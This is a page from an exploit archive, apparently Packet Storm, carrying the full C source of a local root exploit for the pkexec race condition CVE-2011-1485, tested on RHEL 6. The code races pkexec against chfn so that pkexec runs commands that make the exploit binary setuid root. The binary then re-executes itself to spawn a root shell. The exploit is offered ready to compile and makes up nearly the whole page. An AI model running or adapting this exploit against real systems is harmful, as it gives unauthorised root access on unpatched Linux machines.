what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

pkexec Race Condition

pkexec Race Condition
Posted Oct 9, 2011
Authored by xi4oyu

pkexec race condition privilege escalation exploit.

tags | exploit
advisories | CVE-2011-1485
SHA-256 | 055dfe828e2174149cd6a6f47e2e9872df8b0c0a1d7903ed1d201259fe0bf81c

pkexec Race Condition

Change Mirror Download
/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
¡Á U can reach us @ http://www.wooyun.org :)
*/
#include <stdio.h>
#include <limits.h>
#include <time.h>
#include <unistd.h>
#include <termios.h>
#include <sys/stat.h>
#include <errno.h>
#include <poll.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>



int main(int argc,char *argv[], char ** envp)
{

time_t tim_seed1;
pid_t pid_seed2;
int result;
struct stat stat_buff;

char * chfn_path = "/usr/bin/chfn";
char cmd_buff[4096];

char * pkexec_argv[] = {
"/usr/bin/pkexec",
"/bin/sh",
"-c",
cmd_buff,
NULL
};
int pipe1[2];
int pipe2[2];
int pipe3[2];
pid_t pid,pid2 ;
char * chfn_argv[] = {
"/usr/bin/chfn",
NULL
};

char buff[8];
char read_buff[4096];
char real_path[512];
struct termios termios_p;

int count = 0;
int flag = 0;
int usleep1 = 0;
int usleep2 = 0;


bzero(cmd_buff,4096);
bzero(real_path,512);
realpath(argv[0],real_path);

tim_seed1 = time(NULL);
pid_seed2 = getpid();
srand(tim_seed1+pid_seed2);




//get terminal attr
tcgetattr(0,&termios_p);
snprintf(cmd_buff,4095,"/bin/chown root:root %s; /bin/chmod 4755 %s",real_path,real_path);
// printf("Cmd line:%s",cmd_buff);
if(! geteuid()){
//Succs => r00t!
char * exec_argv[2]={
"/bin/sh",
NULL
};
setuid(0);
setgid(0);
execve("/bin/sh",exec_argv,0);
perror("execve shell");
exit(-1);
}

printf("pkexec local root exploit by xi4oyu , thx to dm\n");

if(pipe(pipe1)){
perror("pipe");
exit(-2);
}

for(count = 500; count && !flag; count--){

// printf("Count %d\n",count);
pid = fork();
if( !pid ){
// Parent
if( !pipe(pipe2)){

if(!pipe(pipe3)){
pid2 = fork();
if(!pid2){
// Parent 2
close(1);
close(2);
close(pipe1[0]);
dup2(pipe1[1],2);
dup2(pipe1[1],1);
close(pipe1[1]);
close(pipe2[0]);
close(pipe3[1]);
write(pipe2[1],"\xFF",1);
read(pipe3[0],&buff,1);

execve(pkexec_argv[0],pkexec_argv,envp);
perror("execve pkexec");
exit(-3);

}
close(0);
close(1);
close(2);
close(pipe2[1]);
close(pipe3[0]);
read(pipe2[0],&buff,1);
write(pipe3[1],"\xFF",1);
usleep(usleep1+usleep2);

execve(chfn_argv[0],chfn_argv,envp);
perror("execve setuid");
exit(1);
}


}
perror("pipe3");
exit(1);
}

//Note: This is child, no pipe3 we use poll to monitor pipe1[0]
memset(pipe3,0,8);

struct pollfd * pollfd = (struct pollfd *)(&pipe3);
pollfd->fd = pipe1[0];
pollfd->events = POLLRDNORM;

if(poll(pollfd,1,1000) < 0){

perror("poll");
exit(1);
}

if(pollfd->revents & POLLRDNORM ){
memset(read_buff,0,4096);
read(pipe1[0],read_buff,4095);
if( strstr(read_buff,"does not match")){
usleep1 += 500;
usleep2 = rand() % 1000;

}else{
usleep1 -= 500;


}


}

if(!stat(real_path,&stat_buff)){
if(!stat_buff.st_uid){
if(!stat_buff.st_gid){
if(stat_buff.st_mode & 0x800){

char *exec_array[]={
real_path,
NULL
};

flag = 1;
tcsetattr(0,2,&termios_p);
execve(real_path,exec_array,0);
perror("execve self");
exit(1);
}
}

}
}

tcsetattr(0,2,&termios_p);

}
result = 0;
return result;

}

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close